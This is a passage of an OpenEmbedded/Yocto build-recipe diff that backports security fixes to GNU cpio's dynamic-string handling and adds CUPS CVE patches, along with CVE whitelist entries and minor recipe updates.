+* src/copyout.c: Likewise.
+* src/copypass.c: Likewise.
+* src/util.c: Likewise.
+---
+ src/copyin.c   | 40 +++++++++++------------
+ src/copyout.c  | 16 ++++-----
+ src/copypass.c | 34 +++++++++----------
+ src/dstring.c  | 88 ++++++++++++++++++++++++++++++++++++--------------
+ src/dstring.h  | 31 +++++++++---------
+ src/util.c     |  6 ++--
+ 6 files changed, 123 insertions(+), 92 deletions(-)
+
+diff --git a/src/copyin.c b/src/copyin.c
+index b29f348..37e503a 100644
+--- a/src/copyin.c
++++ b/src/copyin.c
+@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
+   char *str_res;		/* Result for string function.  */
+   static dynamic_string new_name;	/* New file name for rename option.  */
+   static int initialized_new_name = false;
++
+   if (!initialized_new_name)
+-  {
+-    ds_init (&new_name, 128);
+-    initialized_new_name = true;
+-  }
++    {
++      ds_init (&new_name);
++      initialized_new_name = true;
++    }
+ 
+   if (rename_flag)
+     {
+@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
+    already in `save_patterns' (from the command line) are preserved.  */
+ 
+ static void
+-read_pattern_file ()
++read_pattern_file (void)
+ {
+-  int max_new_patterns;
+-  char **new_save_patterns;
+-  int new_num_patterns;
++  char **new_save_patterns = NULL;
++  size_t max_new_patterns;
++  size_t new_num_patterns;
+   int i;
+-  dynamic_string pattern_name;
++  dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
+   FILE *pattern_fp;
+ 
+   if (num_patterns < 0)
+     num_patterns = 0;
+-  max_new_patterns = 1 + num_patterns;
+-  new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
+   new_num_patterns = num_patterns;
+-  ds_init (&pattern_name, 128);
++  max_new_patterns = num_patterns;
++  new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
+ 
+   pattern_fp = fopen (pattern_file_name, "r");
+   if (pattern_fp == NULL)
+     open_fatal (pattern_file_name);
+   while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
+     {
+-      if (new_num_patterns >= max_new_patterns)
+-	{
+-	  max_new_patterns += 1;
+-	  new_save_patterns = (char **)
+-	    xrealloc ((char *) new_save_patterns,
+-		      max_new_patterns * sizeof (char *));
+-	}
++      if (new_num_patterns == max_new_patterns)
++	new_save_patterns = x2nrealloc (new_save_patterns,
++					&max_new_patterns,
++					sizeof (new_save_patterns[0]));
+       new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
+       ++new_num_patterns;
+     }
++
++  ds_free (&pattern_name);
++  
+   if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
+     close_error (pattern_file_name);
+ 
+@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
+    in the file system.  */
+ 
+ void
+-process_copy_in ()
++process_copy_in (void)
+ {
+   char done = false;		/* True if trailer reached.  */
+   FILE *tty_in = NULL;		/* Interactive file for rename option.  */
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..26e3dda 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
+    The format of the header depends on the compatibility (-c) flag.  */
+ 
+ void
+-process_copy_out ()
++process_copy_out (void)
+ {
+-  dynamic_string input_name;	/* Name of file read from stdin.  */
++  dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++                                /* Name of file read from stdin.  */
+   struct stat file_stat;	/* Stat record for file.  */
+   struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
+                                 /* Output header information.  */
+@@ -605,7 +606,6 @@ process_copy_out ()
+   char *orig_file_name = NULL;
+ 
+   /* Initialize the copy out.  */
+-  ds_init (&input_name, 128);
+   file_hdr.c_magic = 070707;
+ 
+   /* Check whether the output file might be a tape.  */
+@@ -657,14 +657,9 @@ process_copy_out ()
+ 	    {
+ 	      if (file_hdr.c_mode & CP_IFDIR)
+ 		{
+-		  int len = strlen (input_name.ds_string);
+ 		  /* Make sure the name ends with a slash */
+-		  if (input_name.ds_string[len-1] != '/')
+-		    {
+-		      ds_resize (&input_name, len + 2);
+-		      input_name.ds_string[len] = '/';
+-		      input_name.ds_string[len+1] = 0;
+-		    }
++		  if (!ds_endswith (&input_name, '/'))
++		    ds_append (&input_name, '/');
+ 		}
+ 	    }
+ 	  
+@@ -875,6 +870,7 @@ process_copy_out ()
+ 			 (unsigned long) blocks), (unsigned long) blocks);
+     }
+   cpio_file_stat_free (&file_hdr);
++  ds_free (&input_name);
+ }
+ 
+ 
+diff --git a/src/copypass.c b/src/copypass.c
+index dc13b5b..62f31c6 100644
+--- a/src/copypass.c
++++ b/src/copypass.c
+@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
+    If `link_flag', link instead of copying.  */
+ 
+ void
+-process_copy_pass ()
++process_copy_pass (void)
+ {
+-  dynamic_string input_name;	/* Name of file from stdin.  */
+-  dynamic_string output_name;	/* Name of new file.  */
++  dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++                                /* Name of file from stdin.  */
++  dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
++                                /* Name of new file.  */
+   size_t dirname_len;		/* Length of `directory_name'.  */
+   int res;			/* Result of functions.  */
+   char *slash;			/* For moving past slashes in input name.  */
+@@ -65,25 +67,18 @@ process_copy_pass ()
+ 				   created files  */
+ 
+   /* Initialize the copy pass.  */
+-  ds_init (&input_name, 128);
+   
+   dirname_len = strlen (directory_name);
+   if (change_directory_option && !ISSLASH (directory_name[0]))
+     {
+       char *pwd = xgetcwd ();
+-
+-      dirname_len += strlen (pwd) + 1;
+-      ds_init (&output_name, dirname_len + 2);
+-      strcpy (output_name.ds_string, pwd);
+-      strcat (output_name.ds_string, "/");
+-      strcat (output_name.ds_string, directory_name);
++      
++      ds_concat (&output_name, pwd);
++      ds_append (&output_name, '/');
+     }
+-  else
+-    {
+-      ds_init (&output_name, dirname_len + 2);
+-      strcpy (output_name.ds_string, directory_name);
+-    }
+-  output_name.ds_string[dirname_len] = '/';
++  ds_concat (&output_name, directory_name);
++  ds_append (&output_name, '/');
++  dirname_len = ds_len (&output_name);
+   output_is_seekable = true;
+ 
+   change_dir ();
+@@ -116,8 +111,8 @@ process_copy_pass ()
+       /* Make the name of the new file.  */
+       for (slash = input_name.ds_string; *slash == '/'; ++slash)
+ 	;
+-      ds_resize (&output_name, dirname_len + strlen (slash) + 2);
+-      strcpy (output_name.ds_string + dirname_len + 1, slash);
++      ds_reset (&output_name, dirname_len);
++      ds_concat (&output_name, slash);
+ 
+       existing_dir = false;
+       if (lstat (output_name.ds_string, &out_file_stat) == 0)
+@@ -333,6 +328,9 @@ process_copy_pass ()
+ 			 (unsigned long) blocks),
+ 	       (unsigned long) blocks);
+     }
++
++  ds_free (&input_name);
++  ds_free (&output_name);
+ }
+ 
+ /* Try and create a hard link from FILE_NAME to another file 
+diff --git a/src/dstring.c b/src/dstring.c
+index e9c063f..358f356 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -20,8 +20,8 @@
+ #if defined(HAVE_CONFIG_H)
+ # include <config.h>
+ #endif
+-
+ #include <stdio.h>
++#include <stdlib.h>
+ #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
+ #include <string.h>
+ #else
+@@ -33,24 +33,41 @@
+ /* Initialiaze dynamic string STRING with space for SIZE characters.  */
+ 
+ void
+-ds_init (dynamic_string *string, int size)
++ds_init (dynamic_string *string)
++{
++  memset (string, 0, sizeof *string);
++}
++
++/* Free the dynamic string storage. */
++
++void
++ds_free (dynamic_string *string)
+ {
+-  string->ds_length = size;
+-  string->ds_string = (char *) xmalloc (size);
++  free (string->ds_string);
+ }
+ 
+-/* Expand dynamic string STRING, if necessary, to hold SIZE characters.  */
++/* Expand dynamic string STRING, if necessary.  */
+ 
+ void
+-ds_resize (dynamic_string *string, int size)
++ds_resize (dynamic_string *string)
+ {
+-  if (size > string->ds_length)
++  if (string->ds_idx == string->ds_size)
+     {
+-      string->ds_length = size;
+-      string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
++      string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
++				      1);
+     }
+ }
+ 
++/* Reset the index of the dynamic string S to LEN. */
++
++void
++ds_reset (dynamic_string *s, size_t len)
++{
++  while (len > s->ds_size)
++    ds_resize (s);
++  s->ds_idx = len;
++}
++
+ /* Dynamic string S gets a string terminated by the EOS character
+    (which is removed) from file F.  S will increase
+    in size during the function if the string from F is longer than
+@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
+ char *
+ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ {
+-  int insize;			/* Amount needed for line.  */
+-  int strsize;			/* Amount allocated for S.  */
+   int next_ch;
+ 
+   /* Initialize.  */
+-  insize = 0;
+-  strsize = s->ds_length;
++  s->ds_idx = 0;
+ 
+   /* Read the input string.  */
+-  next_ch = getc (f);
+-  while (next_ch != eos && next_ch != EOF)
++  while ((next_ch = getc (f)) != eos && next_ch != EOF)
+     {
+-      if (insize >= strsize - 1)
+-	{
+-	  ds_resize (s, strsize * 2 + 2);
+-	  strsize = s->ds_length;
+-	}
+-      s->ds_string[insize++] = next_ch;
+-      next_ch = getc (f);
++      ds_resize (s);
++      s->ds_string[s->ds_idx++] = next_ch;
+     }
+-  s->ds_string[insize++] = '\0';
++  ds_resize (s);
++  s->ds_string[s->ds_idx] = '\0';
+ 
+-  if (insize == 1 && next_ch == EOF)
++  if (s->ds_idx == 0 && next_ch == EOF)
+     return NULL;
+   else
+     return s->ds_string;
+ }
+ 
++void
++ds_append (dynamic_string *s, int c)
++{
++  ds_resize (s);
++  s->ds_string[s->ds_idx] = c;
++  if (c)
++    {
++      s->ds_idx++;
++      ds_resize (s);
++      s->ds_string[s->ds_idx] = 0;
++    }      
++}
++
++void
++ds_concat (dynamic_string *s, char const *str)
++{
++  size_t len = strlen (str);
++  while (len + 1 > s->ds_size)
++    ds_resize (s);
++  memcpy (s->ds_string + s->ds_idx, str, len);
++  s->ds_idx += len;
++  s->ds_string[s->ds_idx] = 0;
++}
++
+ char *
+ ds_fgets (FILE *f, dynamic_string *s)
+ {
+@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
+ {
+   return ds_fgetstr (f, s, '\0');
+ }
++
++/* Return true if the dynamic string S ends with character C. */
++int
++ds_endswith (dynamic_string *s, int c)
++{
++  return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
++}
+diff --git a/src/dstring.h b/src/dstring.h
+index b5135fe..f5b04ef 100644
+--- a/src/dstring.h
++++ b/src/dstring.h
+@@ -17,10 +17,6 @@
+    Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
+    Boston, MA 02110-1301 USA.  */
+ 
+-#ifndef NULL
+-#define NULL 0
+-#endif
+-
+ /* A dynamic string consists of record that records the size of an
+    allocated string and the pointer to that string.  The actual string
+    is a normal zero byte terminated string that can be used with the
+@@ -30,22 +26,25 @@
+ 
+ typedef struct
+ {
+-  int ds_length;		/* Actual amount of storage allocated.  */
+-  char *ds_string;		/* String.  */
++  size_t ds_size;   /* Actual amount of storage allocated.  */
++  size_t ds_idx;    /* Index of the next free byte in the string. */
++  char *ds_string;  /* String storage. */
+ } dynamic_string;
+ 
++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
+ 
+-/* Macros that look similar to the original string functions.
+-   WARNING:  These macros work only on pointers to dynamic string records.
+-   If used with a real record, an "&" must be used to get the pointer.  */
+-#define ds_strlen(s)		strlen ((s)->ds_string)
+-#define ds_strcmp(s1, s2)	strcmp ((s1)->ds_string, (s2)->ds_string)
+-#define ds_strncmp(s1, s2, n)	strncmp ((s1)->ds_string, (s2)->ds_string, n)
+-#define ds_index(s, c)		index ((s)->ds_string, c)
+-#define ds_rindex(s, c)		rindex ((s)->ds_string, c)
++void ds_init (dynamic_string *string);
++void ds_free (dynamic_string *string);
++void ds_reset (dynamic_string *s, size_t len);
+ 
+-void ds_init (dynamic_string *string, int size);
+-void ds_resize (dynamic_string *string, int size);
++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
+ char *ds_fgetname (FILE *f, dynamic_string *s);
+ char *ds_fgets (FILE *f, dynamic_string *s);
+ char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
++void ds_append (dynamic_string *s, int c);
++void ds_concat (dynamic_string *s, char const *str);
++
++#define ds_len(s) ((s)->ds_idx)
++
++int ds_endswith (dynamic_string *s, int c);
++
+diff --git a/src/util.c b/src/util.c
+index 4421b20..6d6bbaa 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
+   FILE *tty_out;		/* File for interacting with user.  */
+   int old_tape_des;
+   char *next_archive_name;
+-  dynamic_string new_name;
++  dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
+   char *str_res;
+ 
+-  ds_init (&new_name, 128);
+-
+   /* Open files for interactive communication.  */
+   tty_in = fopen (TTY_NAME, "r");
+   if (tty_in == NULL)
+@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
+     error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
+ 	   old_tape_des, tape_des);
+ 
+-  free (new_name.ds_string);
++  ds_free (&new_name);
+   fclose (tty_in);
+   fclose (tty_out);
+ }
+-- 
+2.25.1
+
+
+From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 11 Aug 2021 18:10:38 +0300
+Subject: [PATCH 2/3] Fix previous commit
+
+* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
+loop.
+---
+ src/dstring.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 358f356..90c691c 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -64,7 +64,7 @@ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+   while (len > s->ds_size)
+-    ds_resize (s);
++    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+   s->ds_idx = len;
+ }
+ 
+@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
+ {
+   size_t len = strlen (str);
+   while (len + 1 > s->ds_size)
+-    ds_resize (s);
++    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+   memcpy (s->ds_string + s->ds_idx, str, len);
+   s->ds_idx += len;
+   s->ds_string[s->ds_idx] = 0;
+-- 
+2.25.1
+
+
+From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 18 Aug 2021 09:41:39 +0300
+Subject: [PATCH 3/3] Fix dynamic string reallocations
+
+* src/dstring.c (ds_resize): Take additional argument: number of
+bytes to leave available after ds_idx.  All uses changed.
+---
+ src/dstring.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 90c691c..0f597cc 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
+ /* Expand dynamic string STRING, if necessary.  */
+ 
+ void
+-ds_resize (dynamic_string *string)
++ds_resize (dynamic_string *string, size_t len)
+ {
+-  if (string->ds_idx == string->ds_size)
++  while (len + string->ds_idx >= string->ds_size)
+     {
+       string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
+ 				      1);
+@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
+ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+-  while (len > s->ds_size)
+-    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++  ds_resize (s, len);
+   s->ds_idx = len;
+ }
+ 
+@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+   /* Read the input string.  */
+   while ((next_ch = getc (f)) != eos && next_ch != EOF)
+     {
+-      ds_resize (s);
++      ds_resize (s, 0);
+       s->ds_string[s->ds_idx++] = next_ch;
+     }
+-  ds_resize (s);
++  ds_resize (s, 0);
+   s->ds_string[s->ds_idx] = '\0';
+ 
+   if (s->ds_idx == 0 && next_ch == EOF)
+@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ void
+ ds_append (dynamic_string *s, int c)
+ {
+-  ds_resize (s);
++  ds_resize (s, 0);
+   s->ds_string[s->ds_idx] = c;
+   if (c)
+     {
+       s->ds_idx++;
+-      ds_resize (s);
++      ds_resize (s, 0);
+       s->ds_string[s->ds_idx] = 0;
+     }      
+ }
+@@ -115,8 +114,7 @@ void
+ ds_concat (dynamic_string *s, char const *str)
+ {
+   size_t len = strlen (str);
+-  while (len + 1 > s->ds_size)
+-    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++  ds_resize (s, len);
+   memcpy (s->ds_string + s->ds_idx, str, len);
+   s->ds_idx += len;
+   s->ds_string[s->ds_idx] = 0;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index 9e35a80f8b..5ab567f360 100644
--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
 SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
            file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
            file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+           file://CVE-2021-38185.patch \
+           file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \
+           file://0004-Fix-appending-to-archives-bigger-than-2G.patch \
            "
 
 SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8
 
 inherit autotools gettext texinfo
 
+# Issue applies to use of cpio in SUSE/OBS, doesn't apply to us
+CVE_CHECK_WHITELIST += "CVE-2010-4226"
+
 EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}"
 
 do_install () {
diff --git a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
index 82995219dc..9cdb71f1a1 100644
--- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
+++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Password strength checker library"
-HOMEPAGE = "http://sourceforge.net/projects/cracklib"
+HOMEPAGE = "https://github.com/cracklib/cracklib"
+DESCRIPTION = "${SUMMARY}"
 
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06"
diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc
index c5a60bde12..6cfe314f20 100644
--- a/meta/recipes-extended/cups/cups.inc
+++ b/meta/recipes-extended/cups/cups.inc
@@ -13,11 +13,23 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t
            file://0002-don-t-try-to-run-generated-binaries.patch \
            file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \
            file://0004-cups-fix-multilib-install-file-conflicts.patch\
+           file://CVE-2022-26691.patch \
+           file://CVE-2023-32324.patch \
+           file://CVE-2023-34241.patch \
+           file://CVE-2023-32360.patch \
+           file://CVE-2023-4504.patch \
            "
 
 UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases"
 UPSTREAM_CHECK_REGEX = "cups-(?P<pver>\d+\.\d+(\.\d+)?)-source.tar"
 
+# Issue only applies to MacOS
+CVE_CHECK_WHITELIST += "CVE-2008-1033"
+# Issue affects pdfdistiller plugin used with but not part of cups
+CVE_CHECK_WHITELIST += "CVE-2009-0032"
+# This is an Ubuntu only issue.
+CVE_CHECK_WHITELIST += "CVE-2018-6553"
+
 LEAD_SONAME = "libcupsdriver.so"
 
 CLEANBROKEN = "1"
@@ -34,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi',
 PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi"
 PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl"
 PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam"
-PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd"
+PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd"
 PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd"
 
 EXTRA_OECONF = " \
@@ -45,6 +57,9 @@ EXTRA_OECONF = " \
                --enable-debug \
                --disable-relro \
                --enable-libusb \
+               --with-system-groups=lpadmin \
+               --with-cups-group=lp \
+               --with-domainsocket=/run/cups/cups.sock \
                DSOFLAGS='${LDFLAGS}' \
                "
 
@@ -106,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess"
 cups_sysroot_preprocess () {
 	sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:'
 }
+
+# -25317 concerns /var/log/cups having lp ownership.  Our /var/log/cups is
+# root:root, so this doesn't apply.
+CVE_CHECK_WHITELIST += "CVE-2021-25317"
diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
new file mode 100644
index 0000000000..1fa5a54c70
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
@@ -0,0 +1,33 @@
+From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 26 May 2022 06:27:04 +0200
+Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes
+ CVE-2022-26691)
+
+The previous algorithm didn't expect the strings can have a different
+length, so one string can be a substring of the other and such substring
+was reported as equal to the longer string.
+
+CVE: CVE-2022-26691
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444]
+Signed-off-by: Steve Sakoman
+
+---
+diff --git a/scheduler/cert.c b/scheduler/cert.c
+index b268bf1b2..9b65b96c9 100644
+--- a/scheduler/cert.c
++++ b/scheduler/cert.c
+@@ -434,5 +434,12 @@ ctcompare(const char *a,		/* I - First string */
+     b ++;
+   }
+ 
+-  return (result);
++ /*
++  * The while loop finishes when *a == '\0' or *b == '\0'
++  * so after the while loop either both *a and *b == '\0',
++  * or one points inside a string, so when we apply logical OR on *a,
++  * *b and result, we get a non-zero return value if the compared strings don't match.
++  */
++
++  return (result | *a | *b);
+ }
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
new file mode 100644
index 0000000000..40b89c9899
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
@@ -0,0 +1,36 @@
+From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 1 Jun 2023 12:04:00 +0200
+Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324)
+
+CVE: CVE-2023-32324
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589]
+
+(cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e)
+Signed-off-by: Sanjay Chitroda <schitrod@cisco.com>
+---
+ cups/string.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/cups/string.c b/cups/string.c
+index 93cdad19..6ef58515 100644
+--- a/cups/string.c
++++ b/cups/string.c
+@@ -1,6 +1,7 @@
+ /*
+  * String functions for CUPS.
+  *
++ * Copyright © 2023 by OpenPrinting.
+  * Copyright © 2007-2019 by Apple Inc.
+  * Copyright © 1997-2007 by Easy Software Products.
+  *
+@@ -730,6 +731,9 @@ _cups_strlcpy(char       *dst,		/* O - Destination string */
+   size_t	srclen;			/* Length of source string */
+ 
+ 
++  if (size == 0)
++    return (0);
++
+  /*
+   * Figure out how much room is needed...
+   */
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
new file mode 100644
index 0000000000..4d39e1e57f
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
@@ -0,0 +1,31 @@
+From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001
+From: Michael R Sweet <michael.r.sweet@gmail.com>
+Date: Tue, 6 Dec 2022 09:04:01 -0500
+Subject: [PATCH] Require authentication for CUPS-Get-Document.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913]
+CVE: CVE-2023-32360
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ conf/cupsd.conf.in | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in
+index b258849078..a07536f3e4 100644
+--- a/conf/cupsd.conf.in
++++ b/conf/cupsd.conf.in
+@@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@
+     Order deny,allow
+   </Limit>
+ 
+-  <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document>
++  <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job>
++    Require user @OWNER @SYSTEM
++    Order deny,allow
++  </Limit>
++
++  <Limit CUPS-Get-Document>
++    AuthType Default
+     Require user @OWNER @SYSTEM
+     Order deny,allow
+   </Limit>
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
new file mode 100644
index 0000000000..816efc2946
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
@@ -0,0 +1,65 @@
+From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001
+From: Rose <83477269+AtariDreams@users.noreply.github.com>
+Date: Thu, 1 Jun 2023 11:33:39 -0400
+Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection
+
+httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to.
+
+We have to log the hostname first.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2]
+CVE: CVE-2023-34241
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ scheduler/client.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/scheduler/client.c b/scheduler/client.c
+index 91e441188c..327473a4d1 100644
+--- a/scheduler/client.c
++++ b/scheduler/client.c
+@@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+    /*
+     * Can't have an unresolved IP address with double-lookups enabled...
+     */
+-
+-    httpClose(con->http);
+-
+     cupsdLogClient(con, CUPSD_LOG_WARN,
+-                    "Name lookup failed - connection from %s closed!",
++                    "Name lookup failed - closing connection from %s!",
+                     httpGetHostname(con->http, NULL, 0));
+ 
++    httpClose(con->http);
+     free(con);
+     return;
+   }
+@@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+       * with double-lookups enabled...
+       */
+ 
+-      httpClose(con->http);
+-
+       cupsdLogClient(con, CUPSD_LOG_WARN,
+-                      "IP lookup failed - connection from %s closed!",
++                      "IP lookup failed - closing connection from %s!",
+                       httpGetHostname(con->http, NULL, 0));
++
++      httpClose(con->http);
+       free(con);
+       return;
+     }
+@@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ 
+   if (!hosts_access(&wrap_req))
+   {
+-    httpClose(con->http);
+-
+     cupsdLogClient(con, CUPSD_LOG_WARN,
+                     "Connection from %s refused by /etc/hosts.allow and "
+ 		    "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0));
++
++    httpClose(con->http);
+     free(con);
+     return;
+   }
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
new file mode 100644
index 0000000000..be0db1fbd4
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
@@ -0,0 +1,40 @@
+From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
